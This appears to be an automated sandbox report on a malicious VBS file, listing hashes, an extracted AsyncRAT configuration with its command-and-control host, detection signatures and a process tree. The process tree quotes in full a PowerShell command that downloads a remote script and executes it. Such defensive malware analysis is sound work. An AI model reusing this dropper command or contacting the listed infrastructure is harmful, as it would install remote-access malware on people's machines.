Resubmissions

15-04-2022 01:59

220415-cefc7sbff3 10

14-04-2022 17:03

220414-vknwmsdchl 10

Analysis

  • max time kernel
    79s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220331-en
  • submitted
    14-04-2022 17:03

General

  • Target

    Report Details.vbs

  • Size

    57KB

  • MD5

    52d94e55aac61768976f39040c288eef

  • SHA1

    e942fa64351f106b614b28e86d3a42d50e5a0443

  • SHA256

    fcd18b069a963b01f447b35ac7f12421ac36f8c577a1f19880ea0258e0505747

  • SHA512

    fe278c9483992b979e356ec4380182d7519d47144cf3ed9c9caaf0346c4bcb788272562f57264ac7a3a35bf67e9e36ac19ec5d5a07d9564a99360de77b72b717

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    ps1.dropper
    https://textbin.net/raw/x6lfwhnyrz

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

crazydns.linkpc.net:5900

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Meta Stealer Stealer

    Meta Stealer steals passwords stored in browsers, written in C++.

  • suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT)

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Report Details.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://textbin.net/raw/x6lfwhnyrz'); [String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData); [System.IO.File]::WriteAllText('C:\Users\Public\x6lfwhnyrz.PS1', $ByteToString, [System.Text.Encoding]::UTF8); Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:\Users\Public\x6lfwhnyrz.PS1'
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4292
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\x6lfwhnyrz.PS1
        3⤵
        • Drops startup file
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3372
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fuiqaogg\fuiqaogg.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4660
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES790D.tmp" "c:\Users\Admin\AppData\Local\Temp\fuiqaogg\CSCCF543FBEF7C40D8B3AA52C04D3E18.TMP"
            5⤵
            PID:1420
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2032

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      85df31411080f87203ed45b0dab4f336

      SHA1

      5bf5b44ce38fa21c305c1a375da9e6ad84f48892

      SHA256

      e15527444c709b53eca9bc57890b4f6340fce53de1b5b0302a547f18da5974e5

      SHA512

      963cf413d03add219bc832009f2ae5de426a4fae0633f02dfe90db4754f375e8bbe06d967bb6cbca59d1c41476126f1c78d2073adb5ba39ca420adafa3b0944c

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      143a478fb47996f74bbbcdaa252b9e0b

      SHA1

      288893a45c1c50f8245a32aa06dfb1ac2ff31c83

      SHA256

      6d91b6cc49e12bf850b873bfd57f591a37fe1aef5ca6e2bc8855dc866abf479b

      SHA512

      e7e2d235fc60e58fe10961515db7f1a667cc58268b8cd3066afa5e7e4de0b1217e3cb85fbe24230b3eb7ac94399fa42971772954a0c309d3cb9334b7a67f93d8

    • C:\Users\Admin\AppData\Local\Temp\RES790D.tmp

      Filesize

      1KB

      MD5

      eee1b185b88898782ba2146fb08b2aab

      SHA1

      d5ed11e53788bb2dbdde365850c521411ef93796

      SHA256

      840739d3dad95fcdf2fd56cef243661514ed53e9478113c7b10ec4c95c53913a

      SHA512

      fcc7fad2d44326bbad2234ea15f64e947a084f168c1499727be5adc47c9e1a8b5a523a59c181a98b2e585d731f324b70e908ac03ca1c39a37cc27419a13287de

    • C:\Users\Admin\AppData\Local\Temp\fuiqaogg\fuiqaogg.dll

      Filesize

      11KB

      MD5

      9463e864f2bb73ddada3fc51b5b6f95a

      SHA1

      0f90fc695df44d8893dcdb38aa6ebdb8235fbdc5

      SHA256

      f65211b8a3514a760a67d6e9451ae5c2bd5dc773b0d0fbf7bac8bb4f6bbec3a6

      SHA512

      d6838ce1cc6cc2b70f01ab332d6b2a723ee8384628f0736b93af8326b46d08e676fa3bf59049238098af44eb1d9836dca55d6df1e191b84c92f0cd08fc0ef522

    • C:\Users\Public\x6lfwhnyrz.PS1

      Filesize

      119KB

      MD5

      8a4c64e0dc47055ac4df009b38c5c442

      SHA1

      1cfade9c2531a2721261df5f323b918a96fe6db7

      SHA256

      8d6d23ec88918ca2a42e1f578fa0d353bc6c93a557c9cf77a0704964fd9c9f8e

      SHA512

      18911c1ee6c579b5a4ceb79b0b7fe77f4e2af500a0851cbca9c67f2f852517ff25f352820c30dcde0081a99752765ae5d6d77d68f0d80056ac194fff4ee565f9

    • \??\c:\Users\Admin\AppData\Local\Temp\fuiqaogg\CSCCF543FBEF7C40D8B3AA52C04D3E18.TMP

      Filesize

      652B

      MD5

      be3549f0edb18bb4dffbfa25756ba70a

      SHA1

      f506c7496c880fc2242043431caa1dfe8b4fe937

      SHA256

      2e04831e713969e4f90a2b6bf5bf9850c480ba6fc6ec34e577fd3ff4ebbcc220

      SHA512

      8c4d51ef1ea75e032a79d787d8a2c57e0fdea14bc74898c3e318f2ab91440fe32cfeb9f1010fed44b973212466a10da3504942eebc67595d94c42a66453cb269

    • \??\c:\Users\Admin\AppData\Local\Temp\fuiqaogg\fuiqaogg.0.cs

      Filesize

      14KB

      MD5

      5b28648a4e188b0ebdf2d5edcda61624

      SHA1

      faf0ba6c2ef8d8184881eda8a276796449969e1c

      SHA256

      e92acafc5a9dd128b120809aaf76178275c3d22b13fb7cc2f0d9c624befed1b1

      SHA512

      972fca6205f8927363b751ff51c6cf07c3b42f7cbd8fbe12c1098df539118ecf3d3ce1af3b5d376c8710ed183786fc911279ff81941aba4202a11ca5670b9937

    • \??\c:\Users\Admin\AppData\Local\Temp\fuiqaogg\fuiqaogg.cmdline

      Filesize

      327B

      MD5

      81ba1cd33df5baf939bf1dbc521177c8

      SHA1

      aca79a694f74cf64061faeefa144e1f4e5927277

      SHA256

      e645c5a71bb5cc2af1cae874a10830865165564be070b5bbe9be343ed3e136b6

      SHA512

      4095ad6b0e1fe4434f3a61f0d480c8a4491bbe2707dec4d708e6cdd670c06d68cc33eebfaf6691ca8e40ce3a33779fbb64c127813c6841d7c4248e565941627a

    • memory/2032-145-0x0000000000400000-0x0000000000412000-memory.dmp

      Filesize

      72KB

    • memory/2032-151-0x0000000005C00000-0x0000000005C66000-memory.dmp

      Filesize

      408KB

    • memory/2032-150-0x0000000006140000-0x00000000066E4000-memory.dmp

      Filesize

      5.6MB

    • memory/2032-149-0x0000000005AF0000-0x0000000005B8C000-memory.dmp

      Filesize

      624KB

    • memory/3372-134-0x00007FFCC8120000-0x00007FFCC8BE1000-memory.dmp

      Filesize

      10.8MB

    • memory/3372-137-0x000001C7AE316000-0x000001C7AE318000-memory.dmp

      Filesize

      8KB

    • memory/3372-136-0x000001C7AE313000-0x000001C7AE315000-memory.dmp

      Filesize

      8KB

    • memory/3372-133-0x000001C7AFF40000-0x000001C7B0468000-memory.dmp

      Filesize

      5.2MB

    • memory/3372-132-0x000001C7AF990000-0x000001C7AFA06000-memory.dmp

      Filesize

      472KB

    • memory/3372-135-0x000001C7AE310000-0x000001C7AE312000-memory.dmp

      Filesize

      8KB

    • memory/4292-129-0x000001D3414C6000-0x000001D3414C8000-memory.dmp

      Filesize

      8KB

    • memory/4292-126-0x00007FFCC8120000-0x00007FFCC8BE1000-memory.dmp

      Filesize

      10.8MB

    • memory/4292-125-0x000001D35A7F0000-0x000001D35A812000-memory.dmp

      Filesize

      136KB

    • memory/4292-127-0x000001D3414C0000-0x000001D3414C2000-memory.dmp

      Filesize

      8KB

    • memory/4292-128-0x000001D3414C3000-0x000001D3414C5000-memory.dmp

      Filesize

      8KB